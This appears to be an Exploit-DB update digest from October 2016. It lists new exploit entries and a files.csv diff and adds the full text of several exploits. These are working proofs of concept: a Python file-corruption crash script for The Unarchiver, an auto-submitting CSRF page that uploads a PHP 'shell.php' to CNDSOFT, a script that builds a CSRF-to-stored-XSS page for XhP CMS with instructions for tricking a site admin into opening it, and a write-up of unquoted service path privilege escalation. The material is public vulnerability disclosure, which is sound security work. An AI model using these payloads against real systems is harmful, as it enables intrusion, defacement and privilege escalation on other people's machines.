DB: 2016-10-20

13 new exploits

PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow (PoC)
PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow

PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit
PHP FFI Extension 5.0.5 - Local Safe_mode Bypass

PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow (PoC)
PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow

Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop Exploit
Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop

Apple QuickTime < 7.2 - SMIL Remote Integer Overflow (PoC)
Apple QuickTime < 7.2 - SMIL Remote Integer Overflow

Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow
Mercury/32 4.52 IMAPD - SEARCH Command Authenticated Overflow

Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow (PoC)
Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow

Integramod nederland 1.4.2 - Remote File Inclusion
Integramod Nederland 1.4.2 - Remote File Inclusion

CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload

NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation
NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation

NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation
NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation

The Unarchiver 3.11.1 - '.tar.Z' Crash PoC
XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation
Intel(R) Management Engine Components 8.0.1.1399 - Unquoted Service Path Privilege Escalation
Lenovo RapidBoot HDD Accelerator 1.00.0802 - Unquoted Service Path Privilege Escalation
Lenovo Slim USB Keyboard 1.09 - Unquoted Service Path Privilege Escalation
Vembu StoreGrid 4.0 - Unquoted Service Path Privilege Escalation
Lenovo ThinkVantage Communications Utility 3.0.42.0 - Unquoted Service Path Privilege Escalation
Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed 15.1.0.0096 - Unquoted Service Path Privilege Escalation
Intel(R) PROSet/Wireless WiFi Software 15.01.1000.0927 - Unquoted Service Path Privilege Escalation
PDF Complete 4.1.12 Corporate Edition - Unquoted Service Path Privilege Escalation
Realtek High Definition Audio Driver 6.0.1.6730 - Unquoted Service Path Privilege Escalation

files.csv

@@ -3946,7 +3946,7 @@ id,file,description,date,author,platform,type,port
 4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 - HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0
 4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php query' SQL Injection",2007-08-16,RoXur777,php,webapps,0
 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote,0
-4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow (PoC)",2007-08-18,boecke,windows,dos,0
+4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow",2007-08-18,boecke,windows,dos,0
 4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0
 4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - (cart.php) Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0
 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0
@@ -3964,14 +3964,14 @@ id,file,description,date,author,platform,type,port
 4308,platforms/php/webapps/4308.txt,"Joomla! Component Nice Talk 0.9.3 - (tagid) SQL Injection",2007-08-23,ajann,php,webapps,0
 4309,platforms/php/webapps/4309.txt,"Joomla! Component EventList 0.8 - (did) SQL Injection",2007-08-23,ajann,php,webapps,0
 4310,platforms/php/webapps/4310.txt,"Joomla! Component BibTeX 1.3 - Blind SQL Injection",2007-08-23,ajann,php,webapps,0
-4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit",2007-08-23,NetJackal,windows,local,0
+4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass",2007-08-23,NetJackal,windows,local,0
 4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21
 4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 - 'Search' Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0
 4314,platforms/windows/local/4314.php,"PHP Perl Extension - Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0
 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389
 4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25
 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - (activateuser.php) Local File Inclusion",2007-08-26,bd0rk,php,webapps,0
-4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow (PoC)",2007-08-27,boecke,windows,dos,0
+4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow",2007-08-27,boecke,windows,dos,0
 4319,platforms/hardware/dos/4319.pl,"Thomson SIP phone ST 2030 - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0
 4320,platforms/php/webapps/4320.txt,"SomeryC 0.2.4 - (include.php skindir) Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0
 4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote,0
@@ -4000,7 +4000,7 @@ id,file,description,date,author,platform,type,port
 4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Unauthenticated Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0
 4345,platforms/windows/local/4345.c,"Norman Virus Control - nvcoaft51.sys ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0
 4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,php,webapps,0
-4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop Exploit",2007-08-31,"Beyond Security",linux,dos,0
+4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop",2007-08-31,"Beyond Security",linux,dos,0
 4348,platforms/windows/remote/4348.c,"PPStream - (PowerPlayer.dll 2.0.1.3829) ActiveX Remote Overflow",2007-08-31,dummy,windows,remote,0
 4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection",2007-08-31,k1tk4t,php,webapps,0
 4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection",2007-09-01,Silentz,php,webapps,0
@@ -4012,7 +4012,7 @@ id,file,description,date,author,platform,type,port
 4356,platforms/php/webapps/4356.txt,"eNetman 20050830 - 'index.php' Remote File Inclusion",2007-09-03,JaheeM,php,webapps,0
 4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger - Remote Registry Key Manipulation Exploit",2007-09-03,rgod,windows,remote,0
 4358,platforms/php/webapps/4358.txt,"STPHPLibrary - (STPHPLIB_DIR) Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0
-4359,platforms/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow (PoC)",2007-09-03,"David Vaartjes",multiple,dos,0
+4359,platforms/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow",2007-09-03,"David Vaartjes",multiple,dos,0
 4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (1) (Metasploit)",2007-09-03,"Patrick Webster",windows,remote,0
 4361,platforms/windows/local/4361.pl,"Microsoft Visual Basic 6.0 - VBP_Open OLE Local CodeExec Exploit",2007-09-04,Koshi,windows,local,0
 4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Traversal",2007-09-04,Katatafish,linux,remote,0
@@ -4081,10 +4081,10 @@ id,file,description,date,author,platform,type,port
 4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Remote Unauthenticated Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",hardware,dos,0
 4427,platforms/windows/remote/4427.html,"jetAudio 7.x - ActiveX DownloadFromMusicStore() Code Execution",2007-09-19,h07,windows,remote,0
 4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote,0
-4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow",2007-09-19,void,windows,remote,143
+4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH Command Authenticated Overflow",2007-09-19,void,windows,remote,143
 4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0
 4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise Edition 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0
-4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow (PoC)",2007-09-19,"YAG KOHHA",multiple,dos,0
+4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow",2007-09-19,"YAG KOHHA",multiple,dos,0
 4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - (userreviews.php abc) SQL Injection",2007-09-19,str0ke,php,webapps,0
 4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0
 4435,platforms/php/webapps/4435.pl,"Flip 3.0 - Remote Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0
@@ -4115,7 +4115,7 @@ id,file,description,date,author,platform,type,port
 4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0
 4461,platforms/php/webapps/4461.txt,"lustig.cms Beta 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0
 4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0
-4463,platforms/php/webapps/4463.txt,"Integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0
+4463,platforms/php/webapps/4463.txt,"Integramod Nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0
 4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 - (SRC_PATH) Remote File Inclusion",2007-09-28,w0cker,php,webapps,0
 4465,platforms/php/webapps/4465.txt,"public media manager 1.3 - Remote File Inclusion",2007-09-28,0in,php,webapps,0
 4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 - upload_files.php Arbitrary File Upload",2007-09-28,InATeam,php,webapps,0
@@ -24162,6 +24162,7 @@ id,file,description,date,author,platform,type,port
 26984,platforms/php/webapps/26984.txt,"IceWarp Universal WebMail - /mail/include.html Crafted HTTP_USER_AGENT Arbitrary File Access",2005-12-27,"Tan Chew Keong",php,webapps,0
 26985,platforms/windows/dos/26985.txt,"Microsoft Internet Explorer 5.0.1 - HTML Parsing Denial of Service",2005-12-27,"Christian Deneke",windows,dos,0
 26986,platforms/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 - Cross-Site Scripting",2005-12-23,r0t3d3Vil,cfm,webapps,0
+40575,platforms/php/webapps/40575.html,"CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-10-19,Besim,php,webapps,0
 26987,platforms/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,java,webapps,0
 26988,platforms/php/webapps/26988.txt,"Koobi 5.0 - BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0
 26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,php,webapps,0
@@ -36598,7 +36599,7 @@ id,file,description,date,author,platform,type,port
 40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
 40475,platforms/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)",2016-10-07,Besim,php,webapps,0
 40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script 2.06 - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
-40539,platforms/windows/local/40539.txt,"NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
+40539,platforms/windows/local/40539.txt,"NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
 40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
 40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
 40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
@@ -36652,7 +36653,7 @@ id,file,description,date,author,platform,type,port
 40535,platforms/windows/local/40535.txt,"Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation",2016-10-14,"Saeed Hasanzadeh",windows,local,0
 40536,platforms/windows/dos/40536.py,"Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",windows,dos,0
 40538,platforms/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",windows,local,0
-40540,platforms/windows/local/40540.txt,"NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
+40540,platforms/windows/local/40540.txt,"NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
 40541,platforms/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
 40542,platforms/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps,0
 40543,platforms/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
@@ -36675,7 +36676,19 @@ id,file,description,date,author,platform,type,port
 40566,platforms/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",php,webapps,0
 40567,platforms/windows/local/40567.py,"LanSpy 2.0.0.155 - Local Buffer Overflow",2016-10-18,n30m1nd,windows,local,0
 40569,platforms/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,java,webapps,0
+40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash PoC",2016-10-18,"Antonio Z.",osx,dos,0
 40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80
 40572,platforms/windows/local/40572.cs,"Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
 40573,platforms/windows/local/40573.cs,"Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
 40574,platforms/windows/local/40574.cs,"Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
+40576,platforms/php/webapps/40576.py,"XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-19,"Ahsan Tahir",php,webapps,0
+40577,platforms/windows/local/40577.txt,"IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation",2016-10-19,Amir.ght,windows,local,0
+40579,platforms/windows/local/40579.txt,"Intel(R) Management Engine Components 8.0.1.1399 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
+40580,platforms/windows/local/40580.txt,"Lenovo RapidBoot HDD Accelerator 1.00.0802 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
+40581,platforms/windows/local/40581.txt,"Lenovo Slim USB Keyboard 1.09 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
+40582,platforms/windows/local/40582.txt,"Vembu StoreGrid 4.0 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
+40585,platforms/windows/local/40585.txt,"Lenovo ThinkVantage Communications Utility 3.0.42.0 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
+40583,platforms/windows/local/40583.txt,"Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed 15.1.0.0096 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
+40584,platforms/php/webapps/40584.txt,"Intel(R) PROSet/Wireless WiFi Software 15.01.1000.0927 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",php,webapps,0
+40586,platforms/windows/local/40586.txt,"PDF Complete 4.1.12 Corporate Edition - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0
+40587,platforms/windows/local/40587.txt,"Realtek High Definition Audio Driver 6.0.1.6730 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",windows,local,0

platforms/osx/dos/40570.py

@@ -0,0 +1,39 @@
+# Exploit Title: The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC
+# Date: 10-17-2016
+# Exploit Author: Antonio Z.
+# Vendor Homepage: http://unarchiver.c3.cx/unarchiver
+# Software Link: http://unarchiver.c3.cx/downloads/TheUnarchiver3.11.1.zip
+# Version: 3.11.1
+# Tested on: OS X 10.10, OS X 10.11, OS X 10.12
+
+# More information: https://opensource.apple.com/source/gnuzip/gnuzip-11/gzip/lzw.h
+
+import os, struct, sys
+from mmap import mmap
+
+if len(sys.argv) <= 1:
+    print "Usage: python Local_Crash_PoC.py [file name]"
+    exit()
+
+file_name = sys.argv[1]
+file_mod = open(file_name, 'r+b')
+file_hash = file_mod.read()
+
+def get_extension(file_name):
+    basename = os.path.basename(file_name)
+    extension = '.'.join(basename.split('.')[1:])
+    return '.' + extension if extension else None
+
+def file_maping():
+    maping = mmap(file_mod.fileno(),0)
+    maping.seek(2)
+    maping.write_byte(struct.pack('B', 255))
+    maping.close()
+    
+new_file_name = "Local_Crash_PoC" + get_extension(file_name)
+    
+os.popen('cp ' + file_name + ' ' + new_file_name)
+file_mod = open(new_file_name, 'r+b')
+file_maping()
+file_mod.close()
+print '[+] ' + 'Created file: ' + new_file_name

platforms/php/webapps/40575.html

@@ -0,0 +1,159 @@
+*=========================================================================================================
+# Exploit Title:  CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php)
+# Author: Besim
+# Google Dork: -
+# Date: 19/10/2016
+# Type: webapps
+# Platform : PHP
+# Vendor Homepage: -
+# Software Link: http://www.phpexplorer.com/Goster/1227
+# Version: 2.3
+*=========================================================================================================
+
+
+Vulnerable URL and Parameter
+========================================
+
+Vulnerable URL = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla
+
+Vulnerable Parameter = &mesaj_baslik
+
+
+TECHNICAL DETAILS & POC & POST DATA
+========================================
+
+POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)
+Gecko/20100101 Firefox/49.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://site_name/ofis/index.php?is=kullanici_tanimla
+——
+Content-Type: multipart/form-data;
+boundary=---------------------------5035863528338
+Content-Length: 1037
+
+-----------------------------5035863528338
+Content-Disposition: form-data; name="utf8"
+
+✓
+-----------------------------5035863528338
+Content-Disposition: form-data; name="authenticity_token"
+
+CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=
+-----------------------------5035863528338
+Content-Disposition: form-data; name="kullanici_adi"
+
+meryem
+-----------------------------5035863528338
+Content-Disposition: form-data; name="kullanici_sifresi"
+
+meryem
+-----------------------------5035863528338
+Content-Disposition: form-data; name="kullanici_mail_adresi"
+m@yop.com
+-----------------------------5035863528338
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+30000
+-----------------------------5035863528338
+Content-Disposition: form-data; name="*kullanici_resmi*"; *filename*="shell.php"
+Content-Type: application/octet-stream
+*<?php
+	phpinfo();
+
+ ?>*
+-----------------------------5035863528338
+Content-Disposition: form-data; name="personel_maasi"
+
+5200
+-----------------------------5035863528338--
+
+
+*CSRF PoC - File Upload (Shell.php)*
+
+========================================
+
+<html>
+  <!-- CSRF PoC -->
+  <body>
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "
+http://site_name/ofis/index.php?is=kullanici_tanimla", true);
+        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------5035863528338");
+        xhr.withCredentials = true;
+        var body = "-----------------------------5035863528338\r\n" +
+          "Content-Disposition: form-data; name=\"utf8\"\r\n" +
+          "\r\n" +
+          "\xe2\x9c\x93\r\n" +
+          "-----------------------------5035863528338\r\n" +
+          "Content-Disposition: form-data; name=\"authenticity_token\"\r\n"
++
+          "\r\n" +
+          "CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=\r\n" +
+          "-----------------------------5035863528338\r\n" +
+          "Content-Disposition: form-data; name=\"kullanici_adi\"\r\n" +
+          "\r\n" +
+          "meryem\r\n" +
+          "-----------------------------5035863528338\r\n" +
+          "Content-Disposition: form-data; name=\"kullanici_sifresi\"\r\n"
++
+          "\r\n" +
+          "meryem\r\n" +
+          "-----------------------------5035863528338\r\n" +
+          "Content-Disposition: form-data; name=\"kullanici_mail_adresi\"\r\n" +
+          "\r\n" +
+          "m@yop.com\r\n" +
+          "-----------------------------5035863528338\r\n" +
+          "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
+          "\r\n" +
+          "30000\r\n" +
+          "-----------------------------5035863528338\r\n" +
+          "Content-Disposition: form-data; name=\"kullanici_resmi\"; filename=\"shell.php\"\r\n" +
+          "Content-Type: application/octet-stream\r\n" +
+          "\r\n" +
+          "\x3c?php \r\n" +
+          "\tphpinfo();\r\n" +
+          "\r\n" +
+          " ?\x3e\r\n" +
+          "-----------------------------5035863528338\r\n" +
+          "Content-Disposition: form-data; name=\"personel_maasi\"\r\n" +
+          "\r\n" +
+          "5200\r\n" +
+          "-----------------------------5035863528338--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+      }
+      submitRequest();
+    </script>
+    <form action="#">
+      <input type="button" value="Submit request"
+onclick="submitRequest();" />
+    </form>
+  </body>
+</html>
+
+========================================
+
+*Access File : *http://www.site_name/path/personel_resimleri/shell.php
+
+
+RISK
+========================================
+
+Attacker can arbitrary file upload.
+
+
+--
+
+Besim ALTINOK
+

platforms/php/webapps/40576.py

@@ -0,0 +1,73 @@
+# Exploit Title: XhP CMS 0.5.1 - Cross-Site Request Forgery to Persistent Cross-Site Scripting
+# Exploit Author: Ahsan Tahir
+# Date: 19-10-2016
+# Software Link: https://sourceforge.net/projects/xhp/
+# Vendor: https://sourceforge.net/projects/xhp/
+# Google Dork: inurl:Powered by XHP CMS
+# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial
+# Website: www.ahsan-tahir.com
+# Category: webapps
+# Version: 0.5.1
+# Tested on: [Kali Linux 2.0 | Windows 8.1]
+# Email: mrahsan1337@gmail.com
+
+import os
+import urllib
+
+if os.name == 'nt':
+		os.system('cls')
+else:
+	os.system('clear')
+
+banner = '''
++-==-==-==-==-==-==-==-==-==-==-==-==-==-=-=-=+
+|  __  ___     ____     ____ __  __ ____      |
+|  \ \/ / |__ |  _ \   / ___|  \/  / ___|     |
+|   \  /| '_ \| |_) | | |   | |\/| \___ \     |
+|   /  \| | | |  __/  | |___| |  | |___) |    |
+|  /_/\_\_| |_|_|      \____|_|  |_|____/     | 
+| > XhP CMS 0.5.1 - CSRF to Persistent XSS    |
+| > Exploit Author & Script Coder: Ahsan Tahir|
++=====-----=====-----======-----=====---==-=-=+ 
+'''
+def xhpcsrf():
+
+	print banner
+
+	url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://): "))
+
+	csrfhtmlcode = '''
+	<html>
+	  <!-- CSRF PoC -->
+	  <body>
+	    <form action="http://%s/action.php?module=users&action=process_general_config&box_id=29&page_id=0&basename=index.php&closewindow=&from_page=page=0&box_id=29&action=display_site_settings&errcode=0" method="POST" enctype="multipart/form-data" name="exploit">
+	      <input type="hidden" name="frmPageTitle" value=""accesskey&#61;z&#32;onclick&#61;"alert&#40;document&#46;domain&#41;" />
+	      <input type="hidden" name="frmPageUrl" value="http&#58;&#47;&#47;localhost&#47;xhp&#47;" />
+	      <input type="hidden" name="frmPageDescription" value="&#13;" />
+	      <input type="hidden" name="frmLanguage" value="english" />
+	      <input type="submit" value="Submit request" />
+	    </form>
+		<script type="text/javascript" language="JavaScript">
+		//submit form
+		document.exploit.submit();
+		</script>    
+	  </body>
+	</html>
+
+	''' % url
+
+	print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
+
+	print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
+	extension = ".html"
+	name = raw_input(" Filename: ")
+	filename = name+extension
+	file = open(filename, "w")
+
+	file.write(csrfhtmlcode)
+	file.close()
+	print(" [+] Your exploit is saved as %s")%filename
+	print(" [+] Further Details:\n [!] The code saved in %s will automatically submit without\n any user interaction\n [!] To fully exploit, send the admin of this site a webpage with\n the above code injected in it, when he/she will open it the\n title of their website will be\n changed to an XSS payload, and then\n go to %s and hit ALT+SHIFT+Z on your keyboard, boom! XSS will pop-up!") %(filename, url)
+	print("")
+	
+xhpcsrf()	

platforms/php/webapps/40584.txt

@@ -0,0 +1,77 @@
+# Exploit Title: Intel(R) PROSet/Wireless WiFi Software - Unquoted Service Path Privilege Escalation
+# Date: 10/19/2016
+# Exploit Author: Joey Lane
+# Version: 15.01.1000.0927
+# Tested on: Windows 7 Professional
+
+The Intel(R) PROSet/Wireless WiFi Software installs 2 services with unquoted service paths.  
+This enables a local privilege escalation vulnerability.
+To exploit this vulnerability, a local attacker can insert an executable file in the path of either service.  
+Rebooting the system or restarting either service will run the malicious executable with elevated privileges.
+
+This was tested on version 15.01.1000.0927, but other versions may be affected as well.
+
+
+---------------------------------------------------------------------------
+
+C:\>sc qc EvtEng
+
+[SC] QueryServiceConfig SUCCESS
+
+
+
+SERVICE_NAME: EvtEng
+
+        TYPE               : 10  WIN32_OWN_PROCESS
+
+        START_TYPE         : 2   AUTO_START
+
+        ERROR_CONTROL      : 1   NORMAL
+
+        BINARY_PATH_NAME   : C:\Program Files\Intel\WiFi\bin\EvtEng.exe
+
+        LOAD_ORDER_GROUP   :
+
+        TAG                : 0
+
+        DISPLAY_NAME       : Intel(R) PROSet/Wireless Event Log
+
+        DEPENDENCIES       :
+
+        SERVICE_START_NAME : LocalSystem
+
+
+C:\>sc qc RegSrvc
+
+[SC] QueryServiceConfig SUCCESS
+
+
+
+SERVICE_NAME: RegSrvc
+
+        TYPE               : 10  WIN32_OWN_PROCESS
+
+        START_TYPE         : 2   AUTO_START
+
+        ERROR_CONTROL      : 1   NORMAL
+
+        BINARY_PATH_NAME   : C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
+
+        LOAD_ORDER_GROUP   :
+
+        TAG                : 0
+
+        DISPLAY_NAME       : Intel(R) PROSet/Wireless Registry Service
+
+        DEPENDENCIES       : RPCSS
+
+        SERVICE_START_NAME : LocalSystem
+
+---------------------------------------------------------------------------
+
+
+EXAMPLE:
+
+Using the BINARY_PATH_NAME listed above as an example, an executable named
+"Program.exe" could be placed in "C:\", and it would be executed as the
+Local System user next time the service was restarted.

platforms/php/webapps/4463.txt

@@ -11,7 +11,7 @@ Download: http://sourceforge.net/project/showfiles.php?group_id=191355
 ------------------------
 Exploit:
 
